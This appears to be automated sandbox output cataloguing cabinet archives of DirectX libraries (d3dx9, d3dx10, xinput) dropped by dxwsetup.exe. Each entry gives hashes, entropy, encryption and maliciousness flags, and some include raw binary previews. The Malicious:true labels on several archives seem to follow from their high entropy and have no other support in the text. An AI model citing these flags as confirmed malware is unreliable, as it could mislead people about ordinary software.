MD5:4AFD7F5C0574A0EFD163740ECB142011
SHA1:3EBCA5343804FE94D50026DA91647442DA084302
SHA-256:6E39B3FDB6722EA8AA0DC8F46AE0D8BD6496DD0F5F56BAC618A0A7DD22D6CFB2
SHA-512:6F974ACEC7D6C1B6A423B28810B0840E77A9F9C1F9632C5CBA875BD895E076C7E03112285635CF633C2FA9A4D4E2F4A57437AE8DF88A7882184FF6685EE15F3F
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 40050 bytes, 4 files, at 0x44 +A "xinput1_1_x86.cat" +A "xinput1_1.dll", flags 0x4, ID 6338, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
Category:dropped
Size (bytes):49218
Entropy (8bit):7.962835058038329
Encrypted:false
SSDEEP:768:rrXN+lWp5tvn2v0JeuXfYYJDyRIvwde6hecBLdKd+d4RUJ6HwyQs34VvD4:3gl6tfTVXwcWuqe6htcaJyQW4VvD4
MD5:E207FB904E641246F3F7234DB74121FC
SHA1:1BE8C50C074699BDD9184714E9022B7A2F8BF928
SHA-256:3FDF63211B0DD38069A9C1DF74D7BC42742DE003CEF72AD1486AAA92D74546FA
SHA-512:ED95D53BC351C98C0322753265B0A21C98DF97D0E2FBBC58A6836BFF374B7540B0CEA21371CD4A7EAD654210A42E1F9809CAC6E4EAE2ECF0EF2B88E220DC37F7
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 81141 bytes, 5 files, at 0x44 +A "xinput1_1_x64.cat" +A "xinput1_1.dll", flags 0x4, ID 7457, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
Category:dropped
Size (bytes):90309
Entropy (8bit):7.986243949537019
Encrypted:false
SSDEEP:1536:/0CNqg1WzKHJUq/JSlvxToeSNOUp9BttldRL9zaMNez4fbI9YKztrIrm:/hIg1cEJUxvxlSNOUpfttldRL9zkzAI5
MD5:B0669F7D395078BEE0087B089F0B45C5
SHA1:30506FC3DCE9532EF0A8CB3973347EC9C3C9875F
SHA-256:E63A67783EF7624559F95AB697BF8AFBDAB7ACE31200283EF840E6B94AA16E5A
SHA-512:D7EFCFD85B3CB6CB9B1936B701A9D7D91A6094AA08D8C933EDF8493C6AD57BE05A579980A404B35E9721F71B45F4CAE28399FCA3FF5DF20A9A3138B90F86B94C
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 40098 bytes, 4 files, at 0x44 +A "xinput1_2_x86.cat" +A "xinput1_2.dll", flags 0x4, ID 6335, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
Category:dropped
Size (bytes):49266
Entropy (8bit):7.9632460736333766
Encrypted:false
SSDEEP:768:OuG396sAA1wXXvVFc2755DkphtVmUkt/lnkvH0odpl/q1nk:vwQsAhFcSmpJ3kt/xcd7ek
MD5:16B968CA0C435EE45E77A84C2D0364A9
SHA1:90B17A60A34F6335787A6B2D489CBCD3A4EA98C8
SHA-256:6DD7C0ABE37D3DF7AA6DB7BB352260F4A15DC965FF9D30AA32FE9595C1A18300
SHA-512:3BBBFDF8B5673641EC066C3FB52E6B0D5CE0BC6ED6BFF17AB4AC3FA69A8628B09E5EC8322FC39D2A206974B54D297CAAFF9410197E26D090FE74F963CD535045
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 81182 bytes, 5 files, at 0x44 +A "xinput1_2_x64.cat" +A "xinput1_2.dll", flags 0x4, ID 7454, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
Category:dropped
Size (bytes):90350
Entropy (8bit):7.985841057262195
Encrypted:false
SSDEEP:1536:5lQFOMW9t2gGQtmxC4LbB8GXjgvW/j44krD+W2MLdk6v5yO1Ha6DB/4RPjz6ITda:rIOMWm+tmnbXjVkWW1lgO166cjz6z
MD5:A9D582E44E46E36F37EDB7CBC761179D
SHA1:ED1BEF64385E94CE89AFA704D38408E23B31FA79
SHA-256:C26633D38E0A91B9BE70382E916A83D50E219609F7E05CFB2D27DFAFBE480B43
SHA-512:20011BFB547DEDCE8E6FCEDA22C3A3A83DB140E8A20844F3B0E8741B4474C1FEA73D84708B801E83EAE3CD2D8A2D6C851C3F7CD0154C0382A78BC2C2DF6B01E5
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 185760 bytes, 4 files, at 0x44 +A "d3dx10_00_x86.cat" +A "d3dx10.dll", flags 0x4, ID 5461, number 1, extra bytes 20 in head, 14 datablocks, 0x1 compression
Category:dropped
Size (bytes):194952
Entropy (8bit):7.9966042762544145
Encrypted:true
SSDEEP:3072:x4mJ4SadBGg8IZrdosr2nqOwY7l43gRDlcGgp6VMslgVwxikcBmEi21wx8MqX+dN:xJJ4VWgzZptAqOf6wRD5g0VlgVwxL21I
MD5:75C33157D8A1B123D01B2EAC91573C98
SHA1:E3E65896CE0520413979C0143C3AA9BD3A6A27D3
SHA-256:02DAA8B5AC3752F76C3BFD9A505EBF22B1B4B41E44EB92CE2799033B2330D186
SHA-512:F0F1F1DEA5938E1C7FF2ADF7C8D421C2E68E6D3A8CDF18D0F2F3FE1C6837A4F37B367D2D974C35832D1D85A619948DD0F250C7D6DC4AE39F618F5A2893EAC7DD
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 206847 bytes, 5 files, at 0x44 +A "d3dx10_00_x64.cat" +A "d3dx10.dll", flags 0x4, ID 6580, number 1, extra bytes 20 in head, 17 datablocks, 0x1503 compression
Category:dropped
Size (bytes):216015
Entropy (8bit):7.996946294916653
Encrypted:true
SSDEEP:3072:SGo145qtWQt9fL4bBHlKqDfaqaGm3+vqm9/Xx0b6POnzED/RIxeqTk0T:SGo145qtbt1LaeB36/xc6PkV
MD5:681407075E9B19E5EF2218832F6FAD71
SHA1:E4F4D292A36CD9A3034007EF9D2005694307EB52
SHA-256:F9BD5BB083BD55D1D2A690BC66D6D9DA0B1A8B49F09E811E788C030669121118
SHA-512:E983E7DD3F40510816FF3AE836600A186DBA827B484B0C346C20E43E229189A86D4CB5CF219C1FC35B77AB0668866446F6E9206B279931C927D4ED66AD3625F1
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 47342 bytes, 5 files, at 0x44 +A "xinput1_3_x86.cat" +A "xinput1_3.dll", flags 0x4, ID 8235, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
Category:dropped
Size (bytes):56510
Entropy (8bit):7.973777529821975
Encrypted:false
SSDEEP:1536:BcnwcwzHEdb27WH2SfZDNu75ddnVR+ZFaNk0ZKn4:4wb+2eZonQwt
MD5:B362EC93463D8B6381A864D35D38C512
SHA1:7CE47EBCEDA117D8B9748B5B2D3A6AE99FC239DF
SHA-256:B6C1166C57D91AFEEEAA745238D0D6465FF2084F0606FD29FAF1BFA9E008A6C5
SHA-512:CC57733912E2A296A11CD078372C3B43F1256A93EC5BECD0D1B520EB210FCE60938AA1CAA6DBBCA03292A05495B5ECD212EE5F77E3EBABB11EF31F1975B2D09E
Malicious:false
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 90857 bytes, 6 files, at 0x44 +A "xinput1_3_x64.cat" +A "xinput1_3.dll", flags 0x4, ID 9350, number 1, extra bytes 20 in head, 6 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100025
                                                                                              Entropy (8bit):7.988437274786544
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:Mt5OSvuXSf2rbZu4Kmsr4eLRwPC5B9y7q:MTOBXSSpFI4/PM/ye
                                                                                              MD5:FAE84E0773A74F367124C6D871516B7B
                                                                                              SHA1:CAF8B9D7D4AF965BF445D052D1E835B680D6BBC3
                                                                                              SHA-256:86EE073C199B5080FE4F5BE6AC24BB1117FEA42E4BBCD828B4F0EC26C669B22C
                                                                                              SHA-512:CAF1381CAE7417B57FAEF56D0023BF90C90406748F8813AB85C687DDB81E2498D2F1D5F4BC154903FD5A19836E6F245CD6F5D3927A383F1ACC3BCC41B58FD09B
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....b......D................$...........b...#...................(.........6+. .xinput1_3_x64.cat.h....(.....6. .xinput1_3.dll.h..........6.. .infinst.exe.\...h......6H. .apr2007_xinput_x64.inf............6G. .xinput1_3_x64.inf.....a......6H. .xinput1_3_x64_xp.inf...<.6..CK.\.\S.?....H3`@....B.....t.....D!.! " ].{..`AW........b.k/(....fNN ..z.}...g..of.7...|3#.]4.j...."V.;u.".,..t.....*.. o.!G4.G.<........!.I.P.'..t-B..T.N5...U.......2..S.....:....Ju.S.Q..v"D%..y.KR..B...a (.4.....7......x!L.\..u@.@...B.-G0......A..g...Dj8.j..L.X.."0."...^...kP.&@.}.....PP..k.p..|.`..P..D"... .H.1.h.^.G...#...+Ls..7..!qH."@..."..;,....Iz;u.t....>..Ki.y.~.5M`)SR(..$....&P:........-F...@....-..C.&V....N...Z..!....~.....{X"eo.5.D6.u...Y.9...8.......pg8....g....4....j@.S..T..C.H..7..ID...!.HP}.....7U..@?1".yMi....aA.....[..&.M.0A..'L,.q. 6`..DZ...i2.t..(Sw...e..X..6 ..y$...>....D.&R......>....~..U.Z...X.B.5:HAn.IU..[ .*.MH...8..Tgg'.H.G$H.$........)a...E b.y.>........t.....dF.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1007265 bytes, 4 files, at 0x44 +A "d3dx9_24_x86.cat" +A "d3dx9_24.dll", flags 0x4, ID 4987, number 1, extra bytes 20 in head, 69 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1016433
                                                                                              Entropy (8bit):7.998972724711677
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:T/HUK+hlSM4jwe8WpmQUrxiUyULWoF/V++TYrjVdLa1:bHURewe8W4VN8uF/VhMr5s1
                                                                                              MD5:7029866BA46EC477449510BEEE74F473
                                                                                              SHA1:D2F2C21EAB1C277C930A0D2839903ECC55A9B3E8
                                                                                              SHA-256:3D4E48874BDDCD739CF79BF2B3FD195D7C3E861F738DC2EAB19F347545F83068
                                                                                              SHA-512:B8D709775C8D7CA246D0E52FF33017EE9A718B6C97C008181CD0C43DB7E60023D30D2F99A4930EBA124AF2F80452CBF27836D5B87E2968FB0F594ECA1EBF78DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....^......D...............{............^...#..............E...7.........E2.. .d3dx9_24_x86.cat...!.7.....E2.. .d3dx9_24.dll......."...92.. .d3dx9_24_w9x.inf......."...92.. .d3dx9_24_x86.inf.(~m.?..CK..\.Y..O..........H.$@..(M..X.. R.I...6...#.^.......{w..}&............{.3..gf.e.....0*`..kFm.......i.`p....X..Y-..7]n^..9...e.(.7..^..V.FO+...v.,e.^..l(i~w...M...l...s...z..U.7.c5.b.3..........#1.I.'.F2.C.@.......'Hx /..K.~.`g.).0..".8y....0.8...N.|..v.u@...P...H.R......c;W....yg..x....s...2..\...}..%21.D..... ...q.....E,.....q.Ee..$...66...pGr}.. +..!&&&PK..f.r...x.'..<.. ....kH..@....~l....\....@fD...+y..:UC.%...zy1.........~j..v..{%..v[S.ZEE...5....i;..1.(...&.x._.......R+[A..l..z(.e. .k..jbf.@.336T.[...'...J/-..uHc.u.....6..U.....).l...&.".9.X..H\.N...d.V.g...^...Jv..PQ~#?....V.......j:..p.....k.R.......0o.~..F..70.).4b7......+.:.&.)Qd(9...i....J35q.....T%..b._....,..........)Qjt.DU.B.R.s..-.`.......4HE...JObJDlG.4x......lb..<..C..sHD.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073002 bytes, 5 files, at 0x44 +A "d3dx9_25_x86.cat" +A "d3dx9_25.dll", flags 0x4, ID 6922, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082170
                                                                                              Entropy (8bit):7.999075135168916
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:i0BodqhH/OCy8M+j5lcB4ZfeXBXUd/QLML9bw6Uzc12:iUbffy/+lmBXF8Ioxw6Uo12
                                                                                              MD5:9C5DCA423D9D68349D290DF291DDBEEF
                                                                                              SHA1:D9F1CAE586470EA309CE9F115525B0504FFFAEA4
                                                                                              SHA-256:5487ED4E969A822E5C481CEFB1D4DA3066B1D5EC8C55798B246915ECB58A8665
                                                                                              SHA-512:9F50599321F45FB7451B0A1C0F1DCBD6B4A4E60EE27B0EF5AA29168C1BCE5B08F34329916EA2EA655CD632D0A19C81953C2A5F1277F6A96FB63AFC098236509D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....j_......D...........................j_...#..............H...7.........r2. .d3dx9_25_x86.cat..#.7.....r2}. .d3dx9_25.dll.......#...r2,. .apr2005_d3dx9_25_x86.inf.......#...r2,. .d3dx9_25_w9x.inf.....k.#...r2,. .d3dx9_25_x86.inf.(.0.?..CK..\....'4.A..".+.@.%..C*.4).b!@..$.....a..k.#..v.w.w.]xg...............9{......k....q....6.Z&Ey-.@.....a.0.T...9b......a...b....ilk.+c.5.af.o.vl..............<....s.z..V.7........fa\.G\$En..._..|$.?9.O...!..H.<...#.,...!.^N.<.g"..=.V|O.a..gwcw...t.c.......X..4(.).. .?.S..0k..._2{<%X.......m.*....D&&..v.c ....Av...u.l. K2......R.0.&.XO8b..p."H@^..2..jbb...hg.&...>.>....u..x....2...@.~....9..u.a.M.X...S5d_..|}z"h..1.....<...Z!...V).............}OO...n.2..Q....../.......R+[C..l..(...@......1........$..vs..K. m...e...b..\}u.+.....?..bg...P.......%.pRgTq.t.t.e<..t.Y._.X.?F.(../.......abb.G5.qkb.\..Z...g.....g..(.....f..Lz.8...h.e....t.R.fJ.iJNCv}:.V.:..m.B..JIQrlA..Z5..HR..)9-...:.......V.JP.)t*.....6m....
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1058965 bytes, 5 files, at 0x44 +A "d3dx9_26_x86.cat" +A "d3dx9_26.dll", flags 0x4, ID 6937, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1068133
                                                                                              Entropy (8bit):7.999040217820951
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:NxFMsUF1MmwONoWu85w6SFBu+vveJ0sut3z2A1s9z/D8gigA:V3dm3NoW+9FBhuJ9ut36A1s9z78giP
                                                                                              MD5:029359EBCA4BA5945282E0C021B26102
                                                                                              SHA1:6107919F51E1B952CA600F832A6F86CBBED064B5
                                                                                              SHA-256:C44EABF5BE3B87CD845950670C27F6A1E5D92B7758BA7C39C7849B1EE1C649C0
                                                                                              SHA-512:FA007F257F5267119B247EC4ED368E51FD73E6AEA3097E2FC4E78078C063AF34D161FD1BDCAF3097BB575D2614DBA226A624D060009EE4F7BEDA697EFCF42BB7
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....(......D............................(...#..............G...7..........2b} .d3dx9_26_x86.cat...#.7......2Z| .d3dx9_26.dll......,#....2.} .d3dx9_26_w9x.inf......-#....2.} .d3dx9_26_x86.inf......0#....2.} .jun2005_d3dx9_26_x86.inf...N..>..CK..X....'.. ..P.....&!. .%.A........`.....;v..WTd..........w......{.{..<'...3..;}....=Xv3.e.vc:.yg.i.....1.....V.F.:.fMj ,.|.e.....F..5#?.|6.M.j[Z..k3.....g.f.B(..=v......a<.7..a.=.:...h.f.X6.."..I..I......Od:.!9......~1.H..q.....'....y..\...E..u.S|K.a...:c..B..8g:!?._..E:.A.H...N.a..j..~pI.....V.k.l.W.....X..........`4.2(.....e.>...0...!L..>p.....2d..r<...afffPK.6..t0.V.'HA.....j.o...5B+. .....hy...... M..5t...K.<>..@.G........~h..Xw.B.....F~>.?l..7..].}Xp.m.!......x~6.aY_*.rmH..sr.."Q*..]..d3.{.bXX`P....io...AZ.i..$..1....Gl.....d..AM:6.......p./(..Q.1..1..q....O.c~.c........04...|s3...}..x..I.r..).m.K1.o#.Q.Fa...X7.baY......G{......Z5S.HU..c.tp.z6.4m.B=P...d.6...g.....W..aM...z...L.R.W%...z.F.n.5....54EG.R
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1071684 bytes, 5 files, at 0x44 +A "d3dx9_27_x86.cat" +A "d3dx9_27.dll", flags 0x4, ID 6926, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1080852
                                                                                              Entropy (8bit):7.999138982152864
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:sP2N00PXWcq4UsDMMlsOgDUaQFMBZ0To2xIG:sP2CuZQsVl96fQiZMo2xz
                                                                                              MD5:3E91448A7481A78318DCE123790EE31A
                                                                                              SHA1:AE5FE894790624BAD3E59234577E5CB009196FDF
                                                                                              SHA-256:8C062B22DC2814D4F426827B4BF8CFD95989FD986FB3AAA23438A485EE748D6D
                                                                                              SHA-512:F8318BD7CA4271FC328D19428E4688DA898B6D7FB56CC185AD661D4A18C8169392C63515D7DD2D0B65CBD1F23892D7A0A5D3D77A4CDA6230BA03B3B917E5C39A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....DZ......D...........................DZ...#..............H...<..........2.. .d3dx9_27_x86.cat..d#.<......2b. .d3dx9_27.dll.......#....2.. .aug2005_d3dx9_27_x86.inf.......#....2.. .d3dx9_27_w9x.inf.....p.#....2.. .d3dx9_27_x86.inf.]Z...>..CK..X.[...C.)...1(v.).. 3."J.P.. @(.&.Y..v...].....{.cW.$("..w.....yN<?v.5k.......q.Y..0......Z&.9N.!.....f.0.X...9b......fF......iL..+c...ff.tx.f....no.II...2.LO6..arY...u*..PZM..9.6f..H.<...._..G".K.1...R.I..|......=!....\O}<[/E.#..>.......+...........v!..C..:..Q.$.....s....LD.Q.i....h....b*..aB3c.a.b.W..c.151/,./r.rD>...(.i..%!.......\.......Sn.|t.[{F..Mq..\..5.d......J....J.3&....jN../S_N...Qg...gA..3..:...T.0f7.k..&.a.{o.+.j....:..j.f.s..54..`.}..g......?h....bf...w.(......C)(...$.........gJ~..`.;..P>...e.......c.C..@K...d0.@M0(.YM$.y..78..U.Y...J........W......A.04)...&4..{?....Ce..W.;..0m..x.9......n....Io!.!.>...o.......],OQ..0.Q..[KR5QrU.2)I...m.kU."<^..S..3.Q.....".b.F..UF.uJ....:lZ...p.2.R.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073496 bytes, 5 files, at 0x44 +A "d3dx9_28_x86.cat" +A "d3dx9_28.dll", flags 0x4, ID 6914, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082664
                                                                                              Entropy (8bit):7.999121865147412
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Wa0lNxqf7fg42FhNffA/Lj41q7+YeSFfSKidHVmTJwagz8u:WHXx652fNffm0oleSt3Fwa3u
                                                                                              MD5:B1CCAAFF46FE022439F7DE5EB9EC226F
                                                                                              SHA1:8BB7225DF13E6B449D318E2649AEB45A5F24DAF7
                                                                                              SHA-256:645F8D90B07C69330A8C7C8912D70538411C9A6B2813048DA8AD3C3119487F93
                                                                                              SHA-512:2B59C07584D45705273A975A0223E4443DB190675558AB89D92E1572DE4843BE3D0D1267818B19185E4E438A8BCFA2AF5FB5EF2A119DA270BE4540576FD78C77
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Xa......D...........................Xa...#..............H..............3g. .d3dx9_28_x86.cat..t#........3). .d3dx9_28.dll......#....38. .d3dx9_28_w9x.inf.....x.#....38. .d3dx9_28_x86.inf.......#....38. .dec2005_d3dx9_28_x86.inf...a.>..CK..X.[...C.)...1X..S.I...(M@A.......Pm..;......,.`...=.#v.$("..w.{...yN<?..=k.^..=s...o.jw..et.=..YA..=H.eF..l...,;.17kj....+.jw..Y.ry6..\.Y.4.igecJ...,.g.yp.F.yc.....X...e...L6.....SI..j......."6."...2.... ..+..O$B,..6l. ..B1l.`.....A..rN2..ggf..g..... ..H..Dp$.1..h..X.O..Pi...[LC.L..!d.\....fff................lknfYP@_..|...Q4.!.JBJ..0...Ri[4.=..r<...b.3M/F].._S.J.."......"...P%@...`..l..J.*/.!.3.M.....y.l...TI.d*~8.0fwf.J)M.C.U....<n7......./..&..P.R0...Q.JU..2.`...2.ri....vp:.Lg.:(.....7.H2.p.!....N.).A...bg......$..6.M5Nj.e.U..-9..P..L.5...G5.......A.P.6..6..v.i..6..6........-....`.........&3nN..K.&w.g-c....4K.9..}...U}.."VCf}*b]..B..+.j.D..d5`..k...j...4UR..... ..Ux."].d5g6..l.70&.%J.^...Q.U.5...9..~
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1078760 bytes, 5 files, at 0x44 +A "d3dx9_29_x86.cat" +A "d3dx9_29.dll", flags 0x4, ID 6921, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1087928
                                                                                              Entropy (8bit):7.99922866964108
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWlF24ngnZPhX4ciAwvVHgK6SgHY6OmSfLV+:MWls4gnZTmHx6SgnPCY
                                                                                              MD5:F6CC1C08D0F569B5F59108D39CE3508B
                                                                                              SHA1:E9CF7EDC8C9C4B57A9BADD8386A2117EC5785AAB
                                                                                              SHA-256:4114E76799AF3DA9DB3DAE51305DAD70A05B757E506E4A327092D536CCA7EE75
                                                                                              SHA-512:86DF72D5B15396ACB504C1AC9DE7FF5C0CC9C95A90FDD82DAEDC55BAAD490CC47A71CB511571D37E25DD9BC1EE9652B9723E33879BC1756A7881A8E61EBC59ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....u......D............................u...#..............H.............C4.F .d3dx9_29_x86.cat..#.......C4hE .d3dx9_29.dll......#...C4hF .d3dx9_29_w9x.inf.....x.#...C4hF .d3dx9_29_x86.inf.......#...C4iF .feb2006_d3dx9_29_x86.inf.w.6..>..CK..X.[...C.Q...1XQ.N..........T,..D .$....c.]......#..{.z..]..E....}...?......f.=..=.g.....v..]F.Y3j...8...&....V..S=S.f...1]aQ......a...1..Q...V.....m..e........s..m.[c.....yl.{/.^%q.Z.I ..hg..DH..........$..........AB.....!N.w=!F.g. .s.p.B...X...LL..X.c ....z.B...........b.81...>:/b..*.....511A..[.&.3vo.'.V)..kgjb...\..|..!(.i..%#...8..9U*m..]_.E...c.o.{....|j..r4..CN..2....K..].t.E..CH.2b}I.A_.D...5s.e....K..&..*.n.K....a..p.$29...o.HN..[..k...d......1V.....P..9..e.....p9...c=..RQ .7.H61.e ......I~.v.....p}:.1.:r.i....qb..@K.......AM.(.QM....%.p....+.9....~.J~.J~.J~.....-....`.0LLl...3nL.....t.f/...x.9......n....I/!.!V..X........S,OU..`.tt..u$i...*]...`.6...o..(..).-..tD.....L.B.S.+c.:.Z.n......od<..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1109261 bytes, 5 files, at 0x44 +A "d3dx9_30_x86.cat" +A "d3dx9_30.dll", flags 0x4, ID 6903, number 1, extra bytes 20 in head, 74 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1118429
                                                                                              Entropy (8bit):7.999050518080374
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:OreyPa6AC8e290lruGDhi3TSvHDh+ISNvRNhPmJ0RRuu:cNoeYEuTSvjh+R3WKRv
                                                                                              MD5:B3D644A116C54AFDA42A61B0058BE112
                                                                                              SHA1:9AF7DDC29EEF98810A1A2F85DB0B19B2EC771437
                                                                                              SHA-256:CA7B9C6A49E986C350147F00A6C95C5B577847B5667B75681A1EE15E3A189106
                                                                                              SHA-512:A2D2F12B7B37BD8F5C8465DD13AD31942DF11EE5ED5423DEEEB178E6B594587706D2C5116258BE1562CAA5ECA691358AF3CB83B77898D1012FF521017D199165
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............J..............44f .d3dx9_30_x86.cat..p$........4.e .d3dx9_30.dll......$....4.e .apr2006_d3dx9_30_x86.inf.....z.$....4.e .d3dx9_30_w9x.inf.....+.$....4.e .d3dx9_30_x86.inf.v..[>..CK..X.K..=.. ....+..MBI.. M@.n..QH0....#....c..b/..{.z....E..y.......N8?gg..{..=..{...W..;..:....IA.....a.`.......43GX..r..,.f...+FA..,.....2..a0..2......Z.ty.Ih...m0w..es0Ww.[/.n%q.Z.I...ho......#...G.....\.. 1.P6....;.s.cZ.......t.B...X...LL..X.C.......B.......~......@..!..8..O..O..!mR..fbb.0.8L.f..XO.R.-......Y...y...Q4."5JD...p..s.T.f.2z.6..~...........9VPR.f.BH=.bg.s,.T.!=......O..........B...||}...X..5]R.0.....c.+.4..S....E.7.y...[....3...2$..:qt...7T......Q..@X..Ji...q.Z8.Ea(..@zS.D.3;.b..a.}L.;..PG/-....(...../vL_...@K....c..&....f..y.....3.8fW:.T:N7..W:..t.t...#(.FK.k..X..&...;_...Be.w.....b6.z<..za..}_7.afQ......O{,..Thu...).'+..0{:.V}kI.&Z.JU&&*...B..[.'..t.vK.9.`]..!.)Vht.8e.\.T.....i......I.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1121257 bytes, 5 files, at 0x44 +A "d3dx9_31_x86.cat" +A "d3dx9_31.dll", flags 0x4, ID 6911, number 1, extra bytes 20 in head, 75 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1130449
                                                                                              Entropy (8bit):7.9990817245216945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fd5gyP75nbAgKdWsTLSCs3BZnH50ve35Jxroo6DS:F5fP75nbt0STRZn9nxrb5
                                                                                              MD5:F778928C9EB950EF493857F76A5811AD
                                                                                              SHA1:EA82D97077534751297AE0848FB1672E8F21E51E
                                                                                              SHA-256:4891E2DEA9D1798F6A89308E58C61A38E612F8433301EA2376AE14C3DFCB3021
                                                                                              SHA-512:1F382A287FC6763B8E8D66825E8256DFB7D0DEAD6B6A6B51DD7C4A5C86D536CC7EF4128BE0CE495FE17C859018750072DC7B43E3476D1BA435F209CC4EB6D43F
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............K.............<5m. .d3dx9_31_x86.cat...$.......<5.. .d3dx9_31.dll.......$...<5.. .d3dx9_31_w9x.inf.......$...<5.. .d3dx9_31_x86.inf.......$...<5.. .oct2006_d3dx9_31_x86.inf.j5o.s>..CK..\....oh"....Fl..'.......i.*vC..... `..w...6.....`.....;..E..........l.w.3....Y,..+......yg.a.....$.`0...6...XZ4.FX..J...l.V..o;F^..lH....3'.f0..G.m..P.[>...G..j..c^....p.<OAO.N.q.Z.E...hk..H...'@../.B.....q`K...y"..-9.r.'.9...x.O.R.8.......c....`Gc..C....>......X.......|0c..tz......./....-.faa.0..<,.V.^X..B......:/...y...3...X.GZ..T......Bi[.KY.x..A...3.[...s..l..J..U..h.../2Z"7......k....yB.E^.r....T........K.....,...X..)..C...z4.....b......o..yv5.!5...CD`&.\.<0..P.y9..e..`{m8..K.:(.....w..la..@.++.N... .y6.m.......,.c...[lc....d..AM.6........ .P...uD.........m...........m.e.`9t..+..aa..@5.y}r.\..rJ.={9f...3...fO4.u.V6u-z.....t.n..*.A..0%.T....L'.[K...Uh....Ul....vum.........N.U..).)Q...x.RaPk5..X3z.e...
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1568416 bytes, 4 files, at 0x44 +A "d3dx9_32_x86.cat" +A "d3dx9_32.dll", flags 0x4, ID 5512, number 1, extra bytes 20 in head, 105 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1577608
                                                                                              Entropy (8bit):7.999092247669469
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:VKo9fY3tlVm3JjPueurZ8zQbC88LHhpu97Sm:V13BFurZ8U18uSm
                                                                                              MD5:A5BEAD938AFDC63ADFECC1DAF5049D7F
                                                                                              SHA1:B3D5BF56F6B9BF87C33009A088BA7785B6363B4E
                                                                                              SHA-256:A1CC7603302EE53D54F4353C223D95E223706924D99B864220B13814EF93EEFB
                                                                                              SHA-512:C9244BBCFE60F347EC8785B1A41B6E243153624EA73B16DB4D624239A69FA76D2DF2E54039D8F4D2C495890AC17B676E390F796118B4E16D9F03683247190362
                                                                                              Malicious:true
